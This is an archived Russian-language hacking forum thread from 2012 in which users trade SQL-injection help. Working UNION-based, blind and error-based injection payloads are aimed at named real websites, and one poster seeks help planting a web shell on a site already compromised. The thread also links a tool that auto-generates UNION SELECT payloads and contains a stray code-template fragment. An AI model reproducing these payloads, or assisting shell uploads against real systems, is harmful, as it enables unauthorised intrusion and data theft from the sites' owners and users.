ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
29.03.2012, 01:46
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме:
58401
Репутация:
0
|
|
Сообщение от skagen
skagen said:
Ну а как можно это автоматизировать? ведь если строк больше 50, это уже гемор
/thread240692.html
|
|
|
29.03.2012, 01:46
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
в любом текстовом редакторе напиши от 1 до 0 через запятую и потом просто вставь 5 раз вот и будет 50,не обязательно чтобы было от 1 до 50
а так есть где то в гугле мини софт для этого
|
|
|
|
29.03.2012, 06:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Faaax
Faaax said:
в любом текстовом редакторе напиши от 1 до 0 через запятую и потом просто вставь 5 раз вот и будет 50,не обязательно чтобы было от 1 до 50
а так есть где то в гугле мини софт для этого
Вот писал под себя:
http://www.sendspace.com/file/7h37av
В поле Number пишется либо число колонок либо вставляется ссылка вида http://site.com/index.php?id=1+ORDER+BY+5+--+ если нажать на поле и в буфере будет ссылка такого вида то она автоматически замениться на http://site.com/index.php?id=1+aNd+1=0+UNION+SELECT+1,2,3,4,5+--+
|
|
|
|
29.03.2012, 07:18
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от GaMeSTeR
GaMeSTeR said:
Помогите залить шелл, есть все права, но не могу найти путь до корня сайта, пробовал найти в конфигах /etc/apache2/sites-available/(здесь не могу подобрать имя конфига)
В ошибке естественно путь тоже не проскакивает. Уже 3 часа угробил на этот сайт. Где ещё можно поискать?
Сообщение от Faaax
Faaax said:
здесь экстрасенсов нету,сылку в студию
" if author else f"
GaMeSTeR said:
Помогите залить шелл, есть все права, но не могу найти путь до корня сайта, пробовал найти в конфигах /etc/apache2/sites-available/(здесь не могу подобрать имя конфига)
В ошибке естественно путь тоже не проскакивает. Уже 3 часа угробил на этот сайт. Где ещё можно поискать?
Сообщение от Faaax
Faaax said:
здесь экстрасенсов нету,сылку в студию
Не хотел светить, но чтобы набраться опыта готов пожертвовать)
http://www.ibs.ua/card.php?id=3182+aNd+'1'='0'+UNION+SELECT+version( ),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 +--+
Все перепробовал но путь до сайта найти не могу, помогите!
|
|
|
|
29.03.2012, 11:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
нужна помосчь с запросом для раскрутки,непойму как вывести инфу
Код:
Code:
http://1000-tv.ru/peredacha/per-list.php?ch=pervyi'&per=pust_govoryat
|
|
|
|
29.03.2012, 11:39
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от Faaax
Faaax said:
нужна помосчь с запросом для раскрутки,непойму как вывести инфу
Код:
Code:
http://1000-tv.ru/peredacha/per-list.php?ch=pervyi'&per=pust_govoryat
Думаю не получиться там фильтрация + если фильтрацию проходим то дописываемся после from'a:
SELECT * ....... from tv1000_db.[sql]_peredacha
|
|
|
|
29.03.2012, 15:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
344922
Репутация:
75
|
|
нарлд как скулю разкрутить? http://www.imperiya.by/news.html?id=69799+union+select+1,2,3,4,5,6,7,8--+
|
|
|
|
29.03.2012, 16:07
|
|
Guest
Сообщений: n/a
Провел на форуме:
195266
Репутация:
53
|
|
Сообщение от qaz
qaz said:
нарлд как скулю разкрутить? http://www.imperiya.by/news.html?id=69799+union+select+1,2,3,4,5,6,7,8--+
Код:
Code:
_http://www.imperiya.by/news.html
?id=69799+and+1=(if(ascii(substr(version(),1,1))=53,1,0))--+
как слепую, вывод в заголовке. версия 5.+
|
|
|
|
29.03.2012, 20:11
|
|
Guest
Сообщений: n/a
Провел на форуме:
9763
Репутация:
8
|
|
помогите ребята
есть Error:
Код:
Code:
http://domain.dm/?s11='
и вывод:
Код:
Code:
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?s11='' AND cookie_info=''' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1]
запрос такой:
Код:
Code:
SELECT is_may_cached FROM mos_jrecache_repository WHERE url='/content/ view/4928/223/' AND cookie_info='';
как раскрутить? |
|
|
|
29.03.2012, 20:34
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Сообщение от \/ITA
\/ITA said:
помогите ребята
есть Error:
Код:
Code:
http://domain.dm/?s11='
и вывод:
Код:
Code:
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''/?s11='' AND cookie_info=''' at line 1]
SQL/DB Error -- [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1')' at line 1]
запрос такой:
Код:
Code:
SELECT is_may_cached FROM mos_jrecache_repository WHERE url='/content/ view/4928/223/' AND cookie_info='';
как раскрутить? Ссылку бы дал. Можешь вот этот код пихнуть:
'+or+(select+count(*)from(select+1+union+select+2+ union+select+3)x+group+by+concat(mid((select+versi on()+),1,64),floor(rand(0)*2)))+--+
или так:
'/**/or/**/(select/**/count(*)from(select/**/1/**/union/**/select/**/2/**/union/**/select/**/3)x/**/group/**/by/**/concat(mid((select/**/version()/**/),1,64),floor(rand(0)*2)))/**/and/**/'1'='1
Минус только ограничение на вывод 63 байта
|
|
|
|
|
|
|
|
Здесь присутствуют: 4 (пользователей: 0 , гостей: 4)
|
|
|
|
Похожие темы
Линейный вид
